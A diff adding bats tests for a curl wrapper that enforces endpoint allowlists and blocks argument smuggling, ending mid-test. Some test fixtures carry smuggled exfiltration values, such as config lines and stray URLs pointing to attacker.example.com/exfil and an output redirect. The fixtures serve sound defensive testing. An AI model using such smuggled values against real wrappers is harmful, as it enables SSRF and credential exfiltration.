+    DOCS_ALLOWLIST="$PROJECT_ROOT/.claude/scripts/lib/allowlists/loa-anthropic-docs.json"
+    OPENAI_ALLOWLIST="$PROJECT_ROOT/.claude/scripts/lib/allowlists/openai.json"
+
+    [[ -f "$SH_VALIDATOR" ]] || skip "endpoint-validator.sh not present"
+    [[ -f "$PY_VALIDATOR" ]] || skip "endpoint-validator.py not present"
+    [[ -f "$PROVIDERS_ALLOWLIST" ]] || skip "loa-providers allowlist not present"
+    [[ -f "$DOCS_ALLOWLIST" ]] || skip "loa-anthropic-docs allowlist not present"
+    [[ -f "$OPENAI_ALLOWLIST" ]] || skip "openai allowlist not present"
+
+    if [[ -x "$PROJECT_ROOT/.venv/bin/python" ]]; then
+        PYTHON_BIN="$PROJECT_ROOT/.venv/bin/python"
+    else
+        PYTHON_BIN="${PYTHON_BIN:-python3}"
+    fi
+    "$PYTHON_BIN" -c "import idna" 2>/dev/null \
+        || skip "idna not available in $PYTHON_BIN"
+
+    WORK_DIR="$(mktemp -d)"
+
+    # Mock curl: PATH-shadow shim that records argv and exits 0. Tests can
+    # override the exit code via $WORK_DIR/curl-exit (read at invocation time).
+    MOCK_BIN="$WORK_DIR/bin"
+    mkdir -p "$MOCK_BIN"
+    cat > "$MOCK_BIN/curl" <<'MOCKEOF'
+#!/usr/bin/env bash
+# Mock curl: writes argv (one arg per line) to curl-argv.txt; exits with
+# whatever's in curl-exit (default 0).
+out_file="${MOCK_CURL_ARGV_LOG:-$(dirname "$0")/../curl-argv.txt}"
+exit_file="${MOCK_CURL_EXIT_FILE:-$(dirname "$0")/../curl-exit}"
+mkdir -p "$(dirname "$out_file")"
+: > "$out_file"
+for arg in "$@"; do
+    printf '%s\n' "$arg" >> "$out_file"
+done
+if [[ -f "$exit_file" ]]; then
+    exit "$(cat "$exit_file")"
+fi
+exit 0
+MOCKEOF
+    chmod +x "$MOCK_BIN/curl"
+
+    export MOCK_CURL_ARGV_LOG="$WORK_DIR/curl-argv.txt"
+    export MOCK_CURL_EXIT_FILE="$WORK_DIR/curl-exit"
+
+    # Source the validator into THIS test process so endpoint_validator__guarded_curl
+    # is callable as a function (matches the production invocation pattern).
+    # shellcheck source=/dev/null
+    source "$SH_VALIDATOR"
+}
+
+teardown() {
+    if [[ -n "${WORK_DIR:-}" ]] && [[ -d "$WORK_DIR" ]]; then
+        rm -rf "$WORK_DIR"
+    fi
+    return 0
+}
+
+# Helper: invoke guarded_curl with the mock curl on PATH, capturing both
+# stdout and stderr, plus the recorded argv.
+_run_guarded() {
+    PATH="$MOCK_BIN:$PATH" run endpoint_validator__guarded_curl "$@"
+}
+
+# ---------------------------------------------------------------------------
+# G1 — Acceptance path: validator passes, curl invoked with hardened flags
+# ---------------------------------------------------------------------------
+
+@test "G1.1 accepts allowlisted URL and invokes curl with hardened flags + URL via --url" {
+    _run_guarded --allowlist "$PROVIDERS_ALLOWLIST" --url "https://api.openai.com/v1/chat/completions"
+    [[ "$status" -eq 0 ]] || {
+        printf 'unexpected status=%d output=%s\n' "$status" "$output" >&2
+        return 1
+    }
+    # curl invoked exactly once (mock writes argv on each call)
+    [[ -f "$MOCK_CURL_ARGV_LOG" ]]
+    # First six argv lines MUST be the hardened defaults in this exact order:
+    #   --proto / =https / --proto-redir / =https / --max-redirs / 10
+    # Ordering matters because real curl applies the LAST occurrence; defaults
+    # FIRST means caller's later flags can be a relaxation, never a tightening
+    # we missed.
+    local expected_head
+    expected_head=$'--proto\n=https\n--proto-redir\n=https\n--max-redirs\n10'
+    local actual_head
+    actual_head="$(head -6 "$MOCK_CURL_ARGV_LOG")"
+    [[ "$actual_head" == "$expected_head" ]] || {
+        printf 'expected hardened defaults at head of argv\nWANT:\n%s\nGOT:\n%s\n' \
+            "$expected_head" "$actual_head" >&2
+        return 1
+    }
+    # URL passed via --url near the end
+    grep -qE '^--url$' "$MOCK_CURL_ARGV_LOG"
+    grep -qE '^https://api\.openai\.com/v1/chat/completions$' "$MOCK_CURL_ARGV_LOG"
+}
+
+@test "G1.2 accepts allowlisted URL and forwards caller curl args after defaults" {
+    _run_guarded --allowlist "$PROVIDERS_ALLOWLIST" --url "https://api.anthropic.com/v1/messages" \
+        -sS --max-time 30 -H "x-api-key: test-key"
+    [[ "$status" -eq 0 ]]
+    # Hardened defaults FIRST, then caller args, then --url URL
+    grep -qE '^-sS$' "$MOCK_CURL_ARGV_LOG"
+    grep -qE '^--max-time$' "$MOCK_CURL_ARGV_LOG"
+    grep -qE '^x-api-key: test-key$' "$MOCK_CURL_ARGV_LOG"
+    # Argv layout check: --proto =https comes before -sS
+    local proto_line caller_line
+    proto_line=$(grep -nE '^--proto$' "$MOCK_CURL_ARGV_LOG" | head -1 | cut -d: -f1)
+    caller_line=$(grep -nE '^-sS$' "$MOCK_CURL_ARGV_LOG" | head -1 | cut -d: -f1)
+    [[ -n "$proto_line" && -n "$caller_line" && "$proto_line" -lt "$caller_line" ]] || {
+        printf 'argv ordering violation: --proto at %s, -sS at %s\n' "$proto_line" "$caller_line" >&2
+        return 1
+    }
+}
+
+@test "G1.3 accepts URL via --url=value form (equals-syntax)" {
+    _run_guarded --allowlist "$PROVIDERS_ALLOWLIST" "--url=https://api.openai.com/v1/responses" -sS
+    [[ "$status" -eq 0 ]]
+    grep -qE '^https://api\.openai\.com/v1/responses$' "$MOCK_CURL_ARGV_LOG"
+}
+
+@test "G1.4 accepts allowlist via --allowlist=path form" {
+    _run_guarded "--allowlist=$PROVIDERS_ALLOWLIST" --url "https://api.openai.com/v1/chat/completions"
+    [[ "$status" -eq 0 ]]
+}
+
+# ---------------------------------------------------------------------------
+# G2 — Rejection path: validator rejects → curl NEVER invoked, exit 78
+# ---------------------------------------------------------------------------
+
+@test "G2.1 rejects URL whose host is not in the allowlist (curl not invoked)" {
+    _run_guarded --allowlist "$PROVIDERS_ALLOWLIST" --url "https://evil.example.com/v1"
+    [[ "$status" -eq 78 ]] || {
+        printf 'expected exit 78 (EX_CONFIG); got %d output=%s\n' "$status" "$output" >&2
+        return 1
+    }
+    [[ ! -f "$MOCK_CURL_ARGV_LOG" ]] || {
+        printf 'curl was invoked despite rejection; argv: %s\n' "$(cat "$MOCK_CURL_ARGV_LOG")" >&2
+        return 1
+    }
+    # Python canonical's stderr should reach our caller
+    [[ "$output" == *'ENDPOINT-NOT-ALLOWED'* ]]
+}
+
+@test "G2.2 rejects http:// scheme even if host would be allowlisted" {
+    _run_guarded --allowlist "$PROVIDERS_ALLOWLIST" --url "http://api.openai.com/v1/chat/completions"
+    [[ "$status" -eq 78 ]]
+    [[ "$output" == *'ENDPOINT-INSECURE-SCHEME'* ]]
+    [[ ! -f "$MOCK_CURL_ARGV_LOG" ]]
+}
+
+@test "G2.3 rejects RFC 1918 / loopback hosts" {
+    _run_guarded --allowlist "$PROVIDERS_ALLOWLIST" --url "https://127.0.0.1/v1/messages"
+    [[ "$status" -eq 78 ]]
+    # Could be ENDPOINT-NOT-ALLOWED or an IPv4-block code depending on validator step ordering
+    [[ "$output" == *'ENDPOINT-'* ]]
+    [[ ! -f "$MOCK_CURL_ARGV_LOG" ]]
+}
+
+@test "G2.4 rejects URL whose host is not in a NARROWER per-caller allowlist" {
+    # openai.json only allows api.openai.com — api.anthropic.com is not in it.
+    _run_guarded --allowlist "$OPENAI_ALLOWLIST" --url "https://api.anthropic.com/v1/messages"
+    [[ "$status" -eq 78 ]]
+    [[ ! -f "$MOCK_CURL_ARGV_LOG" ]]
+}
+
+# ---------------------------------------------------------------------------
+# G3 — Per-caller allowlist independence
+# ---------------------------------------------------------------------------
+
+@test "G3.1 anthropic-docs allowlist accepts code.claude.com" {
+    _run_guarded --allowlist "$DOCS_ALLOWLIST" --url "https://code.claude.com/docs/en/overview" -sL
+    [[ "$status" -eq 0 ]]
+}
+
+@test "G3.2 anthropic-docs allowlist rejects api.openai.com" {
+    _run_guarded --allowlist "$DOCS_ALLOWLIST" --url "https://api.openai.com/v1/chat/completions"
+    [[ "$status" -eq 78 ]]
+    [[ ! -f "$MOCK_CURL_ARGV_LOG" ]]
+}
+
+@test "G3.3 providers allowlist rejects code.claude.com (wrong scope)" {
+    _run_guarded --allowlist "$PROVIDERS_ALLOWLIST" --url "https://code.claude.com/docs/en/overview"
+    [[ "$status" -eq 78 ]]
+    [[ ! -f "$MOCK_CURL_ARGV_LOG" ]]
+}
+
+# ---------------------------------------------------------------------------
+# G4 — Argv usage errors (EX_USAGE = 64)
+# ---------------------------------------------------------------------------
+
+@test "G4.1 missing --allowlist returns EX_USAGE" {
+    _run_guarded --url "https://api.openai.com/v1/chat/completions"
+    [[ "$status" -eq 64 ]]
+    [[ "$output" == *'--allowlist'* ]]
+    [[ ! -f "$MOCK_CURL_ARGV_LOG" ]]
+}
+
+@test "G4.2 missing --url returns EX_USAGE" {
+    _run_guarded --allowlist "$PROVIDERS_ALLOWLIST"
+    [[ "$status" -eq 64 ]]
+    [[ "$output" == *'--url'* ]]
+    [[ ! -f "$MOCK_CURL_ARGV_LOG" ]]
+}
+
+@test "G4.3 nonexistent allowlist file returns EX_USAGE" {
+    _run_guarded --allowlist "/tmp/this-allowlist-does-not-exist-$$.json" \
+        --url "https://api.openai.com/v1/chat/completions"
+    [[ "$status" -eq 64 ]]
+    [[ "$output" == *'allowlist file not found'* ]]
+    [[ ! -f "$MOCK_CURL_ARGV_LOG" ]]
+}
+
+@test "G4.4 dangling --allowlist (no value) returns EX_USAGE" {
+    _run_guarded --allowlist
+    [[ "$status" -eq 64 ]]
+    [[ "$output" == *'--allowlist requires'* ]]
+}
+
+@test "G4.5 dangling --url (no value) returns EX_USAGE" {
+    _run_guarded --allowlist "$PROVIDERS_ALLOWLIST" --url
+    [[ "$status" -eq 64 ]]
+    [[ "$output" == *'--url requires'* ]]
+}
+
+@test "G4.6 unexpected wrapper-flag attempt before --url is rejected (argv smuggling defense)" {
+    # An attacker URL of `--allowlist=/tmp/evil.json` placed BEFORE --url
+    # must NOT be silently treated as a wrapper flag override. Our parser
+    # accepts only the named --allowlist + --url flags; anything else
+    # before --url errors out.
+    _run_guarded --allowlist "$PROVIDERS_ALLOWLIST" --bogus-flag value --url "https://api.openai.com/v1/chat/completions"
+    [[ "$status" -eq 64 ]]
+    [[ "$output" == *'unexpected arg before --url'* ]]
+    [[ ! -f "$MOCK_CURL_ARGV_LOG" ]]
+}
+
+# ---------------------------------------------------------------------------
+# G5 — curl exit code propagation
+# ---------------------------------------------------------------------------
+
+@test "G5.1 curl exit 28 (timeout) is propagated to wrapper caller" {
+    echo 28 > "$MOCK_CURL_EXIT_FILE"
+    _run_guarded --allowlist "$PROVIDERS_ALLOWLIST" --url "https://api.openai.com/v1/chat/completions" \
+        --max-time 1
+    [[ "$status" -eq 28 ]]
+}
+
+@test "G5.2 curl exit 22 (HTTP error w/ --fail) is propagated" {
+    echo 22 > "$MOCK_CURL_EXIT_FILE"
+    _run_guarded --allowlist "$PROVIDERS_ALLOWLIST" --url "https://api.anthropic.com/v1/messages" \
+        --fail
+    [[ "$status" -eq 22 ]]
+}
+
+# ---------------------------------------------------------------------------
+# G6 — Argv ordering: hardened defaults first
+# ---------------------------------------------------------------------------
+
+@test "G6.1 caller-supplied --proto =all does NOT shadow hardened --proto =https (caller-after-default ordering)" {
+    # When a caller passes a relaxing --proto flag AFTER our defaults, real
+    # curl applies the LAST occurrence. We document this as accepted caller
+    # bug rather than defending against it (don't pretend to defend against
+    # malicious in-tree callers). The test pins the argv ORDERING — caller
+    # flags come after defaults — so a future reorder regression surfaces.
+    _run_guarded --allowlist "$PROVIDERS_ALLOWLIST" --url "https://api.openai.com/v1/chat/completions" \
+        --proto "=all"
+    [[ "$status" -eq 0 ]]
+    # Hardened --proto =https appears BEFORE caller --proto =all in argv
+    local default_proto_line caller_proto_line
+    default_proto_line=$(awk '/^--proto$/{n++; if(n==1){print NR; exit}}' "$MOCK_CURL_ARGV_LOG")
+    caller_proto_line=$(awk '/^--proto$/{n++; if(n==2){print NR; exit}}' "$MOCK_CURL_ARGV_LOG")
+    [[ -n "$default_proto_line" && -n "$caller_proto_line" && "$default_proto_line" -lt "$caller_proto_line" ]]
+}
+
+@test "G6.2 --max-redirs 10 is in argv (default redirect bound)" {
+    _run_guarded --allowlist "$PROVIDERS_ALLOWLIST" --url "https://api.openai.com/v1/chat/completions"
+    [[ "$status" -eq 0 ]]
+    grep -qE '^--max-redirs$' "$MOCK_CURL_ARGV_LOG"
+    # Value 10 follows --max-redirs
+    awk '/^--max-redirs$/{getline next_line; if(next_line=="10"){found=1}} END{exit !found}' "$MOCK_CURL_ARGV_LOG"
+}
+
+# ---------------------------------------------------------------------------
+# G7 — URL must be passed via --url (not as positional after caller args)
+# ---------------------------------------------------------------------------
+
+@test "G7.1 trailing positional URL (no --url) is treated as a curl arg, not the URL slot" {
+    # Caller forgets --url, just trails a URL after --allowlist + flags.
+    # This MUST exit 64 (EX_USAGE) because there's no --url; we never
+    # attempt to validate so curl is never invoked.
+    _run_guarded --allowlist "$PROVIDERS_ALLOWLIST" "https://api.openai.com/v1/chat/completions"
+    [[ "$status" -eq 64 ]]
+    [[ "$output" == *'unexpected arg before --url'* ]]
+    [[ ! -f "$MOCK_CURL_ARGV_LOG" ]]
+}
+
+# ---------------------------------------------------------------------------
+# G8 — Function is exposed at source time
+# ---------------------------------------------------------------------------
+
+@test "G8.1 endpoint_validator__guarded_curl is defined as a function after sourcing" {
+    declare -f endpoint_validator__guarded_curl > /dev/null
+}
+
+@test "G8.2 endpoint_validator__check is still defined (regression: helper does not break existing API)" {
+    declare -f endpoint_validator__check > /dev/null
+}
+
+# ---------------------------------------------------------------------------
+# S1 — Smuggling defense: caller cannot pass --config / -K / --next / -:
+#     (cypherpunk CRITICAL on sprint-1E.c.3.a — `curl --config` URL smuggling)
+# ---------------------------------------------------------------------------
+
+@test "S1.1 caller --config in args is REJECTED (smuggling defense)" {
+    # Build a benign config file that just looks like a normal auth config.
+    cat > "$WORK_DIR/cfg" <<'EOF'
+header = "Authorization: Bearer sk-test"
+EOF
+    chmod 600 "$WORK_DIR/cfg"
+    _run_guarded --allowlist "$PROVIDERS_ALLOWLIST" --url "https://api.openai.com/v1/chat/completions" \
+        --config "$WORK_DIR/cfg"
+    [[ "$status" -eq 64 ]]
+    [[ "$output" == *'CONFIG-FLAG-REJECTED'* ]]
+    # curl is NEVER invoked when smuggling vector is detected
+    [[ ! -f "$MOCK_CURL_ARGV_LOG" ]]
+}
+
+@test "S1.2 caller -K in args is REJECTED (smuggling defense, short alias)" {
+    cat > "$WORK_DIR/cfg" <<'EOF'
+header = "X-Test: ok"
+EOF
+    _run_guarded --allowlist "$PROVIDERS_ALLOWLIST" --url "https://api.openai.com/v1/chat/completions" \
+        -K "$WORK_DIR/cfg"
+    [[ "$status" -eq 64 ]]
+    [[ "$output" == *'CONFIG-FLAG-REJECTED'* ]]
+    [[ ! -f "$MOCK_CURL_ARGV_LOG" ]]
+}
+
+@test "S1.3 caller --next in args is REJECTED (URL-state-reset smuggling)" {
+    _run_guarded --allowlist "$PROVIDERS_ALLOWLIST" --url "https://api.openai.com/v1/chat/completions" \
+        --next
+    [[ "$status" -eq 64 ]]
+    [[ "$output" == *'NEXT-FLAG-REJECTED'* ]]
+    [[ ! -f "$MOCK_CURL_ARGV_LOG" ]]
+}
+
+@test "S1.4 caller -: (next short-alias) in args is REJECTED" {
+    _run_guarded --allowlist "$PROVIDERS_ALLOWLIST" --url "https://api.openai.com/v1/chat/completions" \
+        -:
+    [[ "$status" -eq 64 ]]
+    [[ "$output" == *'NEXT-FLAG-REJECTED'* ]]
+    [[ ! -f "$MOCK_CURL_ARGV_LOG" ]]
+}
+
+# ---------------------------------------------------------------------------
+# S2 — --config-auth content gate: only `header = "..."` lines allowed
+# ---------------------------------------------------------------------------
+
+@test "S2.1 --config-auth file with ONLY header lines is accepted" {
+    cat > "$WORK_DIR/auth.cfg" <<'EOF'
+# auth tempfile (mimics write_curl_auth_config output)
+header = "Authorization: Bearer sk-test"
+header = "anthropic-version: 2023-06-01"
+EOF
+    chmod 600 "$WORK_DIR/auth.cfg"
+    _run_guarded --allowlist "$PROVIDERS_ALLOWLIST" --config-auth "$WORK_DIR/auth.cfg" \
+        --url "https://api.openai.com/v1/chat/completions" -sS
+    [[ "$status" -eq 0 ]] || {
+        printf 'unexpected status=%d output=%s\n' "$status" "$output" >&2
+        return 1
+    }
+    # The wrapper appends `--config <file>` itself, AFTER hardened defaults.
+    # Confirm both --config and the auth file path appear in argv.
+    grep -qE '^--config$' "$MOCK_CURL_ARGV_LOG"
+    grep -qFx "$WORK_DIR/auth.cfg" "$MOCK_CURL_ARGV_LOG"
+}
+
+@test "S2.2 --config-auth with embedded url= directive is REJECTED (smuggling)" {
+    cat > "$WORK_DIR/evil.cfg" <<'EOF'
+header = "Authorization: Bearer sk-real"
+url = "https://attacker.example.com/exfil"
+EOF
+    chmod 600 "$WORK_DIR/evil.cfg"
+    _run_guarded --allowlist "$PROVIDERS_ALLOWLIST" --config-auth "$WORK_DIR/evil.cfg" \
+        --url "https://api.openai.com/v1/chat/completions"
+    [[ "$status" -eq 64 ]]
+    [[ "$output" == *'CONFIG-AUTH-INVALID'* ]]
+    [[ ! -f "$MOCK_CURL_ARGV_LOG" ]]
+}
+
+@test "S2.3 --config-auth with embedded next directive is REJECTED" {
+    cat > "$WORK_DIR/next.cfg" <<'EOF'
+header = "X-Real: 1"
+next
+url = "https://evil.example.com/x"
+EOF
+    _run_guarded --allowlist "$PROVIDERS_ALLOWLIST" --config-auth "$WORK_DIR/next.cfg" \
+        --url "https://api.openai.com/v1/chat/completions"
+    [[ "$status" -eq 64 ]]
+    [[ "$output" == *'CONFIG-AUTH-INVALID'* ]]
+    [[ ! -f "$MOCK_CURL_ARGV_LOG" ]]
+}
+
+@test "S2.4 --config-auth with output= directive (file write redirection) is REJECTED" {
+    cat > "$WORK_DIR/output.cfg" <<'EOF'
+header = "X-Test: 1"
+output = "/tmp/exfil.bin"
+EOF
+    _run_guarded --allowlist "$PROVIDERS_ALLOWLIST" --config-auth "$WORK_DIR/output.cfg" \
+        --url "https://api.openai.com/v1/chat/completions"
+    [[ "$status" -eq 64 ]]
+    [[ "$output" == *'CONFIG-AUTH-INVALID'* ]]
+    [[ ! -f "$MOCK_CURL_ARGV_LOG" ]]
+}
+
+@test "S2.5 --config-auth with CR (0x0D) byte is REJECTED (line-folding smuggling)" {
+    # Embed a CR in the middle of a line. grep treats CR-only line ending
+    # as part of one line; without the CR-byte gate, an attacker could
+    # append a smuggled directive after a CR that visually looks like a
+    # newline in `cat` but doesn't trigger our line-by-line regex.
+    printf 'header = "X-Test: 1"\rurl = "https://evil.example.com"\n' \
+        > "$WORK_DIR/cr.cfg"
+    _run_guarded --allowlist "$PROVIDERS_ALLOWLIST" --config-auth "$WORK_DIR/cr.cfg" \
+        --url "https://api.openai.com/v1/chat/completions"
+    [[ "$status" -eq 64 ]]
+    [[ "$output" == *'CR-BYTE'* ]]
+    [[ ! -f "$MOCK_CURL_ARGV_LOG" ]]
+}
+
+@test "S2.6 --config-auth with backslash inside quoted value is REJECTED (escape injection)" {
+    cat > "$WORK_DIR/bs.cfg" <<'EOF'
+header = "X-Test: \"ok\""
+EOF
+    _run_guarded --allowlist "$PROVIDERS_ALLOWLIST" --config-auth "$WORK_DIR/bs.cfg" \
+        --url "https://api.openai.com/v1/chat/completions"
+    [[ "$status" -eq 64 ]]
+    [[ "$output" == *'CONFIG-AUTH-INVALID'* ]]
+    [[ ! -f "$MOCK_CURL_ARGV_LOG" ]]
+}
+
+@test "S2.7 --config-auth with comment + blank lines + header is accepted" {
+    cat > "$WORK_DIR/normal.cfg" <<'EOF'
+# this is a comment
+
+header = "Authorization: Bearer sk-test"
+
+# trailing comment
+EOF
+    _run_guarded --allowlist "$PROVIDERS_ALLOWLIST" --config-auth "$WORK_DIR/normal.cfg" \
+        --url "https://api.openai.com/v1/chat/completions"
+    [[ "$status" -eq 0 ]]
+}
+
+@test "S2.8 --config-auth file does not exist returns EX_USAGE" {
+    _run_guarded --allowlist "$PROVIDERS_ALLOWLIST" \
+        --config-auth "/tmp/this-config-does-not-exist-$$.cfg" \
+        --url "https://api.openai.com/v1/chat/completions"
+    [[ "$status" -eq 64 ]]
+    [[ "$output" == *'--config-auth file not found'* ]]
+}
+
+@test "S2.9 dangling --config-auth (no value) returns EX_USAGE" {
+    _run_guarded --allowlist "$PROVIDERS_ALLOWLIST" --config-auth
+    [[ "$status" -eq 64 ]]
+    [[ "$output" == *'--config-auth requires'* ]]
+}
+
+@test "S2.10 --config-auth with ONLY a comment is accepted (vacuous-but-valid)" {
+    cat > "$WORK_DIR/comment.cfg" <<'EOF'
+# nothing but a comment
+EOF
+    _run_guarded --allowlist "$PROVIDERS_ALLOWLIST" --config-auth "$WORK_DIR/comment.cfg" \
+        --url "https://api.openai.com/v1/chat/completions"
+    [[ "$status" -eq 0 ]]
+}
+
+# ---------------------------------------------------------------------------
+# T1 — Allowlist tree restriction (cypherpunk HIGH on sprint-1E.c.3.a)
+# ---------------------------------------------------------------------------
+
+@test "T1.1 allowlist OUTSIDE the canonical tree is REJECTED" {
+    # Drop a wide-open allowlist OUTSIDE .claude/scripts/lib/allowlists/.
+    cat > "$WORK_DIR/wide-open.json" <<'EOF'
+{"providers": {"any": [{"host": "evil.example.com", "ports": [443]}]}}
+EOF
+    _run_guarded --allowlist "$WORK_DIR/wide-open.json" \
+        --url "https://evil.example.com/x"
+    [[ "$status" -eq 64 ]]
+    [[ "$output" == *'ALLOWLIST-OUT-OF-TREE'* ]]
+    [[ ! -f "$MOCK_CURL_ARGV_LOG" ]]
+}
+
+@test "T1.2 allowlist via symlink pointing outside the tree is REJECTED" {
+    # Create a symlink INSIDE the canonical tree pointing to a file OUTSIDE.
+    # Note: we can't actually write under .claude/ during tests (rules), so
+    # we exercise the realpath -e branch by passing the symlink path directly
+    # — realpath should resolve to the out-of-tree target.
+    cat > "$WORK_DIR/wide-open.json" <<'EOF'
+{"providers": {"any": [{"host": "evil.example.com", "ports": [443]}]}}
+EOF
+    ln -sf "$WORK_DIR/wide-open.json" "$WORK_DIR/symlink.json"
+    _run_guarded --allowlist "$WORK_DIR/symlink.json" \
+        --url "https://evil.example.com/x"
+    [[ "$status" -eq 64 ]]
+    [[ "$output" == *'ALLOWLIST-OUT-OF-TREE'* ]]
+    [[ ! -f "$MOCK_CURL_ARGV_LOG" ]]
+}
+
+@test "T1.3 LOA_ENDPOINT_VALIDATOR_TEST_MODE permits an out-of-tree allowlist when explicitly opted in" {
+    # The test-mode env var is the documented escape hatch for tests that
+    # need a custom allowlist. This pin asserts the gate exists AND requires
+    # the directory env var to be set (NOT just LOA_ENDPOINT_VALIDATOR_TEST_MODE=1
+    # alone — that would be a footgun if test mode leaked into production).
+    cat > "$WORK_DIR/test-allowlist.json" <<'EOF'
+{"providers": {"any": [{"host": "api.openai.com", "ports": [443]}]}}
+EOF
+    LOA_ENDPOINT_VALIDATOR_TEST_MODE=1 \
+    LOA_ENDPOINT_VALIDATOR_TEST_ALLOWLIST_DIR="$WORK_DIR" \
+    PATH="$MOCK_BIN:$PATH" \
+    run endpoint_validator__guarded_curl \
+        --allowlist "$WORK_DIR/test-allowlist.json" \
+        --url "https://api.openai.com/v1/chat/completions"
+    [[ "$status" -eq 0 ]] || {
+        printf 'unexpected status=%d output=%s\n' "$status" "$output" >&2
+        return 1
+    }
+}
+
+@test "T1.4 LOA_ENDPOINT_VALIDATOR_TEST_MODE=1 without TEST_ALLOWLIST_DIR still rejects out-of-tree" {
+    cat > "$WORK_DIR/test-allowlist.json" <<'EOF'
+{"providers": {"any": [{"host": "api.openai.com", "ports": [443]}]}}
+EOF
+    LOA_ENDPOINT_VALIDATOR_TEST_MODE=1 \
+    LOA_ENDPOINT_VALIDATOR_TEST_ALLOWLIST_DIR= \
+    PATH="$MOCK_BIN:$PATH" \
+    run endpoint_validator__guarded_curl \
+        --allowlist "$WORK_DIR/test-allowlist.json" \
+        --url "https://api.openai.com/v1/chat/completions"
+    [[ "$status" -eq 64 ]]
+    [[ "$output" == *'ALLOWLIST-OUT-OF-TREE'* ]]
+}

--- a/tests/integration/endpoint-validator-guarded-curl.bats
+++ b/tests/integration/endpoint-validator-guarded-curl.bats
@@ -561,3 +561,121 @@ EOF
     [[ "$status" -eq 64 ]]
     [[ "$output" == *'ALLOWLIST-OUT-OF-TREE'* ]]
 }
+
+# ---------------------------------------------------------------------------
+# S3 — Smuggling defense extensions (BB iter-1 MEDIUM remediations)
+# ---------------------------------------------------------------------------
+
+@test "S3.1 caller --config=PATH (equals/glued form) is REJECTED (BB iter-1 MEDIUM coverage gap)" {
+    cat > "$WORK_DIR/cfg" <<'EOF'
+header = "X: ok"
+EOF
+    _run_guarded --allowlist "$PROVIDERS_ALLOWLIST" --url "https://api.openai.com/v1/chat/completions" \
+        "--config=$WORK_DIR/cfg"
+    [[ "$status" -eq 64 ]]
+    [[ "$output" == *'CONFIG-FLAG-REJECTED'* ]]
+    [[ ! -f "$MOCK_CURL_ARGV_LOG" ]]
+}
+
+@test "S3.2 caller -KPATH (bundled-short form) is REJECTED" {
+    # curl accepts -K bundled with the file path: `-Kfoo.cfg` means -K foo.cfg.
+    # The wrapper's `-K?*` glob in the case-statement catches this.
+    cat > "$WORK_DIR/cfg" <<'EOF'
+header = "X: ok"
+EOF
+    _run_guarded --allowlist "$PROVIDERS_ALLOWLIST" --url "https://api.openai.com/v1/chat/completions" \
+        "-K$WORK_DIR/cfg"
+    [[ "$status" -eq 64 ]]
+    [[ "$output" == *'CONFIG-FLAG-REJECTED'* ]]
+    [[ ! -f "$MOCK_CURL_ARGV_LOG" ]]
+}
+
+@test "S3.3 caller -K=PATH (bundled-equals form) is REJECTED" {
+    cat > "$WORK_DIR/cfg" <<'EOF'
+header = "X: ok"
+EOF
+    _run_guarded --allowlist "$PROVIDERS_ALLOWLIST" --url "https://api.openai.com/v1/chat/completions" \
+        "-K=$WORK_DIR/cfg"
+    [[ "$status" -eq 64 ]]
+    [[ "$output" == *'CONFIG-FLAG-REJECTED'* ]]
+    [[ ! -f "$MOCK_CURL_ARGV_LOG" ]]
+}
+
+# ---------------------------------------------------------------------------
+# S4 — Positional URL smuggling defense (BB iter-1 MEDIUM, real defense gap)
+# ---------------------------------------------------------------------------
+
+@test "S4.1 stray https:// URL in caller args is REJECTED (curl-positional-URL smuggling)" {
+    # Without this defense, curl would fetch BOTH the validated --url AND
+    # the unvalidated positional URL — a clean SSRF pivot via caller args.
+    _run_guarded --allowlist "$PROVIDERS_ALLOWLIST" \
+        --url "https://api.openai.com/v1/chat/completions" \
+        -sS "https://attacker.example.com/exfil"
+    [[ "$status" -eq 64 ]]
+    [[ "$output" == *'POSITIONAL-URL-REJECTED'* ]]
+    [[ ! -f "$MOCK_CURL_ARGV_LOG" ]]
+}
+
+@test "S4.2 stray http:// (insecure scheme) URL in caller args is REJECTED" {
+    _run_guarded --allowlist "$PROVIDERS_ALLOWLIST" \
+        --url "https://api.openai.com/v1/chat/completions" \
+        -sS "http://attacker.example.com/x"
+    [[ "$status" -eq 64 ]]
+    [[ "$output" == *'POSITIONAL-URL-REJECTED'* ]]
+    [[ ! -f "$MOCK_CURL_ARGV_LOG" ]]
+}
+
+@test "S4.3 case-insensitive: HTTPS:// upper-case in caller args also REJECTED" {
+    _run_guarded --allowlist "$PROVIDERS_ALLOWLIST" \
+        --url "https://api.openai.com/v1/chat/completions" \
+        "HTTPS://Evil.Example.com/X"
+    [[ "$status" -eq 64 ]]
+    [[ "$output" == *'POSITIONAL-URL-REJECTED'* ]]
+    [[ ! -f "$MOCK_CURL_ARGV_LOG" ]]
+}
+
+@test "S4.4 header VALUE containing https:// is NOT rejected (false-positive guard)" {
+    # `-H "Origin: https://api.openai.com"` — the arg starts with "Origin: ",
+    # not with "https://", so the regex correctly does NOT match. This pin
+    # ensures the strict-reject doesn't break legitimate header passing.
+    _run_guarded --allowlist "$PROVIDERS_ALLOWLIST" \
+        --url "https://api.openai.com/v1/chat/completions" \
+        -H "Origin: https://api.openai.com" -sS
+    [[ "$status" -eq 0 ]]
+    grep -qFx 'Origin: https://api.openai.com' "$MOCK_CURL_ARGV_LOG"
+}
+
+# ---------------------------------------------------------------------------
+# S5 — --config-auth argv position pin (BB iter-1 MEDIUM)
+# ---------------------------------------------------------------------------
+
+@test "S5.1 --config-auth file appears in argv BETWEEN hardened defaults and caller args (position pin)" {
+    cat > "$WORK_DIR/auth.cfg" <<'EOF'
+header = "Authorization: Bearer sk-test"
+EOF
+    _run_guarded --allowlist "$PROVIDERS_ALLOWLIST" --config-auth "$WORK_DIR/auth.cfg" \
+        --url "https://api.openai.com/v1/chat/completions" -sS --max-time 30
+    [[ "$status" -eq 0 ]]
+    # Expected exact ordering at the head:
+    #   1-6: hardened defaults (--proto =https, --proto-redir =https, --max-redirs 10)
+    #   7-8: --config <auth-file>
+    #   9+:  caller args (-sS, --max-time, 30)
+    #   tail: --url <url>
+    local expected_head
+    expected_head=$'--proto\n=https\n--proto-redir\n=https\n--max-redirs\n10\n--config\n'"$WORK_DIR/auth.cfg"$'\n-sS\n--max-time\n30\n--url\nhttps://api.openai.com/v1/chat/completions'
+    local actual
+    actual="$(cat "$MOCK_CURL_ARGV_LOG")"
+    [[ "$actual" == "$expected_head" ]] || {
+        printf 'argv layout mismatch\nWANT:\n%s\nGOT:\n%s\n' "$expected_head" "$actual" >&2
+        return 1
+    }
+}
+
+@test "S5.2 without --config-auth, NO --config arg is added to curl invocation" {
+    _run_guarded --allowlist "$PROVIDERS_ALLOWLIST" \
+        --url "https://api.openai.com/v1/chat/completions" -sS
